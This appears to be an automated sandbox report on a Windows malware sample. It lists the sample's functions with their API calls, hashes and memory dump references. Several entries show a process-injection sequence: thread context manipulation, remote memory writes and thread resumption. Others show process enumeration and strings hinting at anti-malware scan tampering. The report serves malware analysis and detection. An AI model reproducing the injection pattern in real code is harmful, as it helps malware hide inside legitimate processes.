                                        • Instruction ID: 78ca72745fd57447110c0cf30e85bd8b465747d9f57c7bd167956e9663217f18
                                        • Opcode Fuzzy Hash: d61ce2c3c763b7742acb03e8648b5f8fe395973a28385ba7f431f6bc08d7eb89
                                        • Instruction Fuzzy Hash: 7DD05BB23081107AD220995A6C44EF76BDCCBC9770F100679B658C7180D7208C018671
                                        Function 02B4ABF8 Relevance: 1.5, APIs: 1, Instructions: 17COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 02B4A95C: GetModuleHandleA.KERNEL32(kernel32.dll,00000002,02B4ABE3,?,?,02B4AC75,00000000,02B4AD51), ref: 02B4A970
                                          • Part of subcall function 02B4A95C: GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 02B4A988
                                          • Part of subcall function 02B4A95C: GetProcAddress.KERNEL32(00000000,Heap32ListFirst), ref: 02B4A99A
                                          • Part of subcall function 02B4A95C: GetProcAddress.KERNEL32(00000000,Heap32ListNext), ref: 02B4A9AC
                                          • Part of subcall function 02B4A95C: GetProcAddress.KERNEL32(00000000,Heap32First), ref: 02B4A9BE
                                          • Part of subcall function 02B4A95C: GetProcAddress.KERNEL32(00000000,Heap32Next), ref: 02B4A9D0
                                          • Part of subcall function 02B4A95C: GetProcAddress.KERNEL32(00000000,Toolhelp32ReadProcessMemory), ref: 02B4A9E2
                                          • Part of subcall function 02B4A95C: GetProcAddress.KERNEL32(00000000,Process32First), ref: 02B4A9F4
                                          • Part of subcall function 02B4A95C: GetProcAddress.KERNEL32(00000000,Process32Next), ref: 02B4AA06
                                          • Part of subcall function 02B4A95C: GetProcAddress.KERNEL32(00000000,Process32FirstW), ref: 02B4AA18
                                          • Part of subcall function 02B4A95C: GetProcAddress.KERNEL32(00000000,Process32NextW), ref: 02B4AA2A
                                          • Part of subcall function 02B4A95C: GetProcAddress.KERNEL32(00000000,Thread32First), ref: 02B4AA3C
                                          • Part of subcall function 02B4A95C: GetProcAddress.KERNEL32(00000000,Thread32Next), ref: 02B4AA4E
                                          • Part of subcall function 02B4A95C: GetProcAddress.KERNEL32(00000000,Module32First), ref: 02B4AA60
                                          • Part of subcall function 02B4A95C: GetProcAddress.KERNEL32(00000000,Module32Next), ref: 02B4AA72
                                          • Part of subcall function 02B4A95C: GetProcAddress.KERNEL32(00000000,Module32FirstW), ref: 02B4AA84
                                          • Part of subcall function 02B4A95C: GetProcAddress.KERNEL32(00000000,Module32NextW), ref: 02B4AA96
                                        • Process32First.KERNEL32(?,00000128), ref: 02B4AC09
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2195355441.0000000002B31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B30000, based on PE: true
                                        • Associated: 00000000.00000002.2195326497.0000000002B30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195493513.0000000002B5D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195493513.0000000002B8E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195675671.0000000002B91000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195675671.0000000002C85000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195675671.0000000002C88000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2b30000_MeP66xi1AM.jbxd
                                        Similarity
                                        • API ID: AddressProc$FirstHandleModuleProcess32
                                        • String ID:
                                        • API String ID: 2774106396-0
                                        • Opcode ID: 43dc0492a8c691d7e41fd46b7de107dbf6efd670c84be9c42dda0044f2c10c28
                                        • Instruction ID: cd01b0d60df3ddb9aa07290089f0a0f84b91a5d358060e80c427c478f66f96a3
                                        • Opcode Fuzzy Hash: 43dc0492a8c691d7e41fd46b7de107dbf6efd670c84be9c42dda0044f2c10c28
                                        • Instruction Fuzzy Hash: F5C08CA37522201B8A1066F82EC88D38B8CCF492F630548F2F609D3103DB25CC10BAA0
                                        Function 02B4AC18 Relevance: 1.5, APIs: 1, Instructions: 17COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 02B4A95C: GetModuleHandleA.KERNEL32(kernel32.dll,00000002,02B4ABE3,?,?,02B4AC75,00000000,02B4AD51), ref: 02B4A970
                                          • Part of subcall function 02B4A95C: GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 02B4A988
                                          • Part of subcall function 02B4A95C: GetProcAddress.KERNEL32(00000000,Heap32ListFirst), ref: 02B4A99A
                                          • Part of subcall function 02B4A95C: GetProcAddress.KERNEL32(00000000,Heap32ListNext), ref: 02B4A9AC
                                          • Part of subcall function 02B4A95C: GetProcAddress.KERNEL32(00000000,Heap32First), ref: 02B4A9BE
                                          • Part of subcall function 02B4A95C: GetProcAddress.KERNEL32(00000000,Heap32Next), ref: 02B4A9D0
                                          • Part of subcall function 02B4A95C: GetProcAddress.KERNEL32(00000000,Toolhelp32ReadProcessMemory), ref: 02B4A9E2
                                          • Part of subcall function 02B4A95C: GetProcAddress.KERNEL32(00000000,Process32First), ref: 02B4A9F4
                                          • Part of subcall function 02B4A95C: GetProcAddress.KERNEL32(00000000,Process32Next), ref: 02B4AA06
                                          • Part of subcall function 02B4A95C: GetProcAddress.KERNEL32(00000000,Process32FirstW), ref: 02B4AA18
                                          • Part of subcall function 02B4A95C: GetProcAddress.KERNEL32(00000000,Process32NextW), ref: 02B4AA2A
                                          • Part of subcall function 02B4A95C: GetProcAddress.KERNEL32(00000000,Thread32First), ref: 02B4AA3C
                                          • Part of subcall function 02B4A95C: GetProcAddress.KERNEL32(00000000,Thread32Next), ref: 02B4AA4E
                                          • Part of subcall function 02B4A95C: GetProcAddress.KERNEL32(00000000,Module32First), ref: 02B4AA60
                                          • Part of subcall function 02B4A95C: GetProcAddress.KERNEL32(00000000,Module32Next), ref: 02B4AA72
                                          • Part of subcall function 02B4A95C: GetProcAddress.KERNEL32(00000000,Module32FirstW), ref: 02B4AA84
                                          • Part of subcall function 02B4A95C: GetProcAddress.KERNEL32(00000000,Module32NextW), ref: 02B4AA96
                                        • Process32Next.KERNEL32(?,00000128), ref: 02B4AC29
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2195355441.0000000002B31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B30000, based on PE: true
                                        • Associated: 00000000.00000002.2195326497.0000000002B30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195493513.0000000002B5D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195493513.0000000002B8E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195675671.0000000002B91000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195675671.0000000002C85000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195675671.0000000002C88000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2b30000_MeP66xi1AM.jbxd
                                        Similarity
                                        • API ID: AddressProc$HandleModuleNextProcess32
                                        • String ID:
                                        • API String ID: 2237597116-0
                                        • Opcode ID: 5b627e147013de1a51432109251a8edc221f90b5fec2b0af77aa713796440824
                                        • Instruction ID: ee97ae6dd4476916ebc888a8cd77c3194a6e6239baa7b15627ee9fa0c94c4356
                                        • Opcode Fuzzy Hash: 5b627e147013de1a51432109251a8edc221f90b5fec2b0af77aa713796440824
                                        • Instruction Fuzzy Hash: 2BC08CA36A22205B8F10B6F83EC88C7478CCF491F630908E2F609D3103EB298C10B2A0
                                        Function 02B37E3C Relevance: 1.5, APIs: 1, Instructions: 16COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetFileAttributesA.KERNEL32(00000000,?,02B52A49,ScanString,02B9137C,02B5AFD8,OpenSession,02B9137C,02B5AFD8,ScanBuffer,02B9137C,02B5AFD8,OpenSession,02B9137C,02B5AFD8,Initialize), ref: 02B37E47
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2195355441.0000000002B31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B30000, based on PE: true
                                        • Associated: 00000000.00000002.2195326497.0000000002B30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195493513.0000000002B5D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195493513.0000000002B8E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195675671.0000000002B91000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195675671.0000000002C85000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195675671.0000000002C88000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2b30000_MeP66xi1AM.jbxd
                                        Similarity
                                        • API ID: AttributesFile
                                        • String ID:
                                        • API String ID: 3188754299-0
                                        • Opcode ID: d4a25932c1186a40cb6d5613e0fc1b23b5cf5f8b84d23e416c631f776c8215f9
                                        • Instruction ID: 52d8adf7c807a34727923eeec0ff688d3f1880efa74ce9bd8c18cd9a33ed1eee
                                        • Opcode Fuzzy Hash: d4a25932c1186a40cb6d5613e0fc1b23b5cf5f8b84d23e416c631f776c8215f9
                                        • Instruction Fuzzy Hash: F9C08CE12022080E5E52A2FC1CC029A62CE8B042343A01FF1E538DA2CADB11D8223410
                                        Function 02B37E18 Relevance: 1.5, APIs: 1, Instructions: 16COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetFileAttributesA.KERNEL32(00000000,?,02B4F8CC,ScanString,02B9137C,02B5AFD8,OpenSession,02B9137C,02B5AFD8,ScanString,02B9137C,02B5AFD8,UacScan,02B9137C,02B5AFD8,UacInitialize), ref: 02B37E23
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2195355441.0000000002B31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B30000, based on PE: true
                                        • Associated: 00000000.00000002.2195326497.0000000002B30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195493513.0000000002B5D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195493513.0000000002B8E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195675671.0000000002B91000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195675671.0000000002C85000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195675671.0000000002C88000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2b30000_MeP66xi1AM.jbxd
                                        Similarity
                                        • API ID: AttributesFile
                                        • String ID:
                                        • API String ID: 3188754299-0
                                        • Opcode ID: 39d99aea2b4b3de8ff8324b5e373e5cbc7456bababb3b7d58f404b20ec88a84a
                                        • Instruction ID: 7078496b8a28abff4e55d1eb41c046900a89a92c66334cc5366358ff89b0b339
                                        • Opcode Fuzzy Hash: 39d99aea2b4b3de8ff8324b5e373e5cbc7456bababb3b7d58f404b20ec88a84a
                                        • Instruction Fuzzy Hash: 0EC08CE22022000B6A52A1FC0CC400A62CC8B042383A40FF5B538CA3D2DB2188223410
                                        Function 02B34C24 Relevance: 1.5, APIs: 1, Instructions: 16COMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2195355441.0000000002B31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B30000, based on PE: true
                                        • Associated: 00000000.00000002.2195326497.0000000002B30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195493513.0000000002B5D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195493513.0000000002B8E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195675671.0000000002B91000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195675671.0000000002C85000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195675671.0000000002C88000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2b30000_MeP66xi1AM.jbxd
                                        Similarity
                                        • API ID: FreeString
                                        • String ID:
                                        • API String ID: 3341692771-0
                                        • Opcode ID: ceb5ae88bf033e98fc82206b21d1e89e82677d744592aa3ef6d188a356359a2c
                                        • Instruction ID: 3c80e1a1a0bb6a368d51a9ed6781f23354f9927e2845ebefb347ab3d20fe2d2e
                                        • Opcode Fuzzy Hash: ceb5ae88bf033e98fc82206b21d1e89e82677d744592aa3ef6d188a356359a2c
                                        • Instruction Fuzzy Hash: 5CC012A261022457EF225A9C9CC075572DCEB05295B5400E1D408D7240E3A49C004664
                                        Function 02B5BB50 Relevance: 1.5, APIs: 1, Instructions: 12COMMON
                                        Download Yara Rule
                                        APIs
                                        • timeSetEvent.WINMM(00002710,00000000,02B5BB44,00000000,00000001), ref: 02B5BB60
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2195355441.0000000002B31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B30000, based on PE: true
                                        • Associated: 00000000.00000002.2195326497.0000000002B30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195493513.0000000002B5D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195493513.0000000002B8E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195675671.0000000002B91000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195675671.0000000002C85000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195675671.0000000002C88000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2b30000_MeP66xi1AM.jbxd
                                        Similarity
                                        • API ID: Eventtime
                                        • String ID:
                                        • API String ID: 2982266575-0
                                        • Opcode ID: db60576d186f4693930567eaf1c820d8a70740904b335c891c6da61c448024a7
                                        • Instruction ID: fae266530dd21c2eb76a51a9fcbd0de063ba81d96a7e797c6c9749b74cd9fe2b
                                        • Opcode Fuzzy Hash: db60576d186f4693930567eaf1c820d8a70740904b335c891c6da61c448024a7
                                        • Instruction Fuzzy Hash: D6C092F17C03003EF62166A82CC2F23768EE704B04FA004A2BA00FE2D5E5E24C600A65
                                        Function 02B34BE4 Relevance: 1.5, APIs: 1, Instructions: 10memoryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • SysAllocStringLen.OLEAUT32(00000000,?), ref: 02B34BEB
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2195355441.0000000002B31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B30000, based on PE: true
                                        • Associated: 00000000.00000002.2195326497.0000000002B30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195493513.0000000002B5D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195493513.0000000002B8E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195675671.0000000002B91000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195675671.0000000002C85000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195675671.0000000002C88000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2b30000_MeP66xi1AM.jbxd
                                        Similarity
                                        • API ID: AllocString
                                        • String ID:
                                        • API String ID: 2525500382-0
                                        • Opcode ID: 45a3375204cc73dd1af73f008c830e5c9ef88422045493d1b6915fbd8ee49b80
                                        • Instruction ID: 22ee556361ed6b48dc69a54ff20c28ab94f7645aadee5e54f2d61907f598655b
                                        • Opcode Fuzzy Hash: 45a3375204cc73dd1af73f008c830e5c9ef88422045493d1b6915fbd8ee49b80
                                        • Instruction Fuzzy Hash: B9B0123C28820219FE1316610D00BB230AC9B51387F8400D19E28C80C0FF00C4108832
                                        Function 02B34BFC Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                        Download Yara Rule
                                        APIs
                                        • SysFreeString.OLEAUT32(00000000), ref: 02B34C03
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2195355441.0000000002B31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B30000, based on PE: true
                                        • Associated: 00000000.00000002.2195326497.0000000002B30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195493513.0000000002B5D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195493513.0000000002B8E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195675671.0000000002B91000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195675671.0000000002C85000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195675671.0000000002C88000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2b30000_MeP66xi1AM.jbxd
                                        Similarity
                                        • API ID: FreeString
                                        • String ID:
                                        • API String ID: 3341692771-0
                                        • Opcode ID: 4210c3dfb18652f6ec0b0b51d6fbd20cd1f444da7e88b25de82dc1dad3c2e2d3
                                        • Instruction ID: fb9aa460568793f93abdc7843fcdcb50aa5d17865373798717c2fe0661450893
                                        • Opcode Fuzzy Hash: 4210c3dfb18652f6ec0b0b51d6fbd20cd1f444da7e88b25de82dc1dad3c2e2d3
                                        • Instruction Fuzzy Hash: 29A022AC0003032A8F0B232C080002A303BBFE03003CAC0E800000A000CF3AC000AC30
                                        Function 02B315CC Relevance: 1.3, APIs: 1, Instructions: 38memoryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • VirtualAlloc.KERNEL32(00000000,00140000,00001000,00000004,?,02B31A03,?,02B32000), ref: 02B315E2
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2195355441.0000000002B31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B30000, based on PE: true
                                        • Associated: 00000000.00000002.2195326497.0000000002B30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195493513.0000000002B5D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195493513.0000000002B8E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195675671.0000000002B91000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195675671.0000000002C85000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195675671.0000000002C88000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2b30000_MeP66xi1AM.jbxd
                                        Similarity
                                        • API ID: AllocVirtual
                                        • String ID:
                                        • API String ID: 4275171209-0
                                        • Opcode ID: 96b04c06739db4a606aeef37edcc228b129ef974377dbda6185474774d546495
                                        • Instruction ID: 0b36e552c75e68b3a5ae9187c777c15b48827b61334820d31e2b705aa917830d
                                        • Opcode Fuzzy Hash: 96b04c06739db4a606aeef37edcc228b129ef974377dbda6185474774d546495
                                        • Instruction Fuzzy Hash: E8F037F5B513005BEB06DF799D443017AD6E789384F1085B9E60DDB298E7719401CB00
                                        Function 02B31682 Relevance: 1.3, APIs: 1, Instructions: 36memoryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • VirtualAlloc.KERNEL32(00000000,?,00101000,00000004,?,?,?,?,02B32000), ref: 02B316A4
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2195355441.0000000002B31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B30000, based on PE: true
                                        • Associated: 00000000.00000002.2195326497.0000000002B30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195493513.0000000002B5D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195493513.0000000002B8E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195675671.0000000002B91000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195675671.0000000002C85000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195675671.0000000002C88000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2b30000_MeP66xi1AM.jbxd
                                        Similarity
                                        • API ID: AllocVirtual
                                        • String ID:
                                        • API String ID: 4275171209-0
                                        • Opcode ID: 535ca2ecab823d8d141026beffba5cd25aa1f67fd39f5bc9f0abdcdf85683b20
                                        • Instruction ID: 39fab3013e57ecdf82d808f8abd114ad89d4356db08e80bc0065458a5f83962d
                                        • Opcode Fuzzy Hash: 535ca2ecab823d8d141026beffba5cd25aa1f67fd39f5bc9f0abdcdf85683b20
                                        • Instruction Fuzzy Hash: A5F0BEB2B407956BD711AF9E9C80B82BB98FB00364F054579FA4C9B340D775A8108FD4
                                        Function 02B316E6 Relevance: 1.3, APIs: 1, Instructions: 25COMMON
                                        Download Yara Rule
                                        APIs
                                        • VirtualFree.KERNEL32(?,00000000,00008000,?,?,00000000,02B31FE4), ref: 02B31704
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2195355441.0000000002B31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B30000, based on PE: true
                                        • Associated: 00000000.00000002.2195326497.0000000002B30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195493513.0000000002B5D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195493513.0000000002B8E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195675671.0000000002B91000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195675671.0000000002C85000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195675671.0000000002C88000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2b30000_MeP66xi1AM.jbxd
                                        Similarity
                                        • API ID: FreeVirtual
                                        • String ID:
                                        • API String ID: 1263568516-0
                                        • Opcode ID: 979c09ebf7041336d5a99ad494d45b8964eca934e32ddbbb135f834706100364
                                        • Instruction ID: 24e3795576ed4346dac77d216ab276d81042ee294e309f053543ff8f2049d297
                                        • Opcode Fuzzy Hash: 979c09ebf7041336d5a99ad494d45b8964eca934e32ddbbb135f834706100364
                                        • Instruction Fuzzy Hash: C2E0CDB5310301AFD7115F7D5D407127BDCEB44764F1844B5F549DB241D660E8108B60

                                        Non-executed Functions

                                        Function 02B4A95C Relevance: 59.6, APIs: 17, Strings: 17, Instructions: 99libraryloaderCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetModuleHandleA.KERNEL32(kernel32.dll,00000002,02B4ABE3,?,?,02B4AC75,00000000,02B4AD51), ref: 02B4A970
                                        • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 02B4A988
                                        • GetProcAddress.KERNEL32(00000000,Heap32ListFirst), ref: 02B4A99A
                                        • GetProcAddress.KERNEL32(00000000,Heap32ListNext), ref: 02B4A9AC
                                        • GetProcAddress.KERNEL32(00000000,Heap32First), ref: 02B4A9BE
                                        • GetProcAddress.KERNEL32(00000000,Heap32Next), ref: 02B4A9D0
                                        • GetProcAddress.KERNEL32(00000000,Toolhelp32ReadProcessMemory), ref: 02B4A9E2
                                        • GetProcAddress.KERNEL32(00000000,Process32First), ref: 02B4A9F4
                                        • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 02B4AA06
                                        • GetProcAddress.KERNEL32(00000000,Process32FirstW), ref: 02B4AA18
                                        • GetProcAddress.KERNEL32(00000000,Process32NextW), ref: 02B4AA2A
                                        • GetProcAddress.KERNEL32(00000000,Thread32First), ref: 02B4AA3C
                                        • GetProcAddress.KERNEL32(00000000,Thread32Next), ref: 02B4AA4E
                                        • GetProcAddress.KERNEL32(00000000,Module32First), ref: 02B4AA60
                                        • GetProcAddress.KERNEL32(00000000,Module32Next), ref: 02B4AA72
                                        • GetProcAddress.KERNEL32(00000000,Module32FirstW), ref: 02B4AA84
                                        • GetProcAddress.KERNEL32(00000000,Module32NextW), ref: 02B4AA96
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2195355441.0000000002B31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B30000, based on PE: true
                                        • Associated: 00000000.00000002.2195326497.0000000002B30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195493513.0000000002B5D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195493513.0000000002B8E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195675671.0000000002B91000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195675671.0000000002C85000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195675671.0000000002C88000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2b30000_MeP66xi1AM.jbxd
                                        Similarity
                                        • API ID: AddressProc$HandleModule
                                        • String ID: CreateToolhelp32Snapshot$Heap32First$Heap32ListFirst$Heap32ListNext$Heap32Next$Module32First$Module32FirstW$Module32Next$Module32NextW$Process32First$Process32FirstW$Process32Next$Process32NextW$Thread32First$Thread32Next$Toolhelp32ReadProcessMemory$kernel32.dll
                                        • API String ID: 667068680-597814768
                                        • Opcode ID: a005855834ffb7952f3b44e07c8b2b807393db236d93b5d3e37ba9e014b93a9e
                                        • Instruction ID: 5fa31d69515d8611eb73a9ca59437ed91a08cf30d89fc6e9643606070ad472f4
                                        • Opcode Fuzzy Hash: a005855834ffb7952f3b44e07c8b2b807393db236d93b5d3e37ba9e014b93a9e
                                        • Instruction Fuzzy Hash: F031FBB0AD0B21AFFB02EFB8D9D5A6637A9EB0678070109E5F006DF215DB74D810AF55
                                        Function 02B48BB0 Relevance: 45.4, APIs: 3, Strings: 22, Instructions: 1654threadnativeinjectionCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 02B48824: LoadLibraryA.KERNEL32(00000000,00000000,02B4890B), ref: 02B48858
                                          • Part of subcall function 02B48824: FreeLibrary.KERNEL32(74FA0000,00000000,02B91388,Function_000065D8,00000004,02B91398,02B91388,05F5E0FF,00000040,02B9139C,74FA0000,00000000,00000000,00000000,00000000,02B4890B), ref: 02B488EB
                                        • GetThreadContext.KERNEL32(00000000,02B91420,ScanString,02B913A4,02B4A77C,UacInitialize,02B913A4,02B4A77C,ScanBuffer,02B913A4,02B4A77C,ScanBuffer,02B913A4,02B4A77C,UacInitialize,02B913A4), ref: 02B49442
                                          • Part of subcall function 02B479B4: NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02B47A27
                                          • Part of subcall function 02B47D00: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02B47D74
                                        • SetThreadContext.KERNEL32(00000000,02B91420,ScanBuffer,02B913A4,02B4A77C,ScanString,02B913A4,02B4A77C,Initialize,02B913A4,02B4A77C,00000000,-00000008,02B914F8,00000004,02B914FC), ref: 02B4A157
                                        • NtResumeThread.C:\WINDOWS\SYSTEM32\NTDLL(00000000,00000000,00000000,02B91420,ScanBuffer,02B913A4,02B4A77C,ScanString,02B913A4,02B4A77C,Initialize,02B913A4,02B4A77C,00000000,-00000008,02B914F8), ref: 02B4A164
                                          • Part of subcall function 02B487A0: LoadLibraryW.KERNEL32(bcrypt,?,00000000,00000000,02B913A4,02B4A3C7,ScanString,02B913A4,02B4A77C,ScanBuffer,02B913A4,02B4A77C,Initialize,02B913A4,02B4A77C,UacScan), ref: 02B487B4
                                          • Part of subcall function 02B487A0: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 02B487CE
                                          • Part of subcall function 02B487A0: FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,00000000,00000000,02B913A4,02B4A3C7,ScanString,02B913A4,02B4A77C,ScanBuffer,02B913A4,02B4A77C,Initialize), ref: 02B4880A
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2195355441.0000000002B31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B30000, based on PE: true
                                        • Associated: 00000000.00000002.2195326497.0000000002B30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195493513.0000000002B5D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195493513.0000000002B8E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195675671.0000000002B91000.00000040.00001000.00020000.00000000.sdmpDownload File
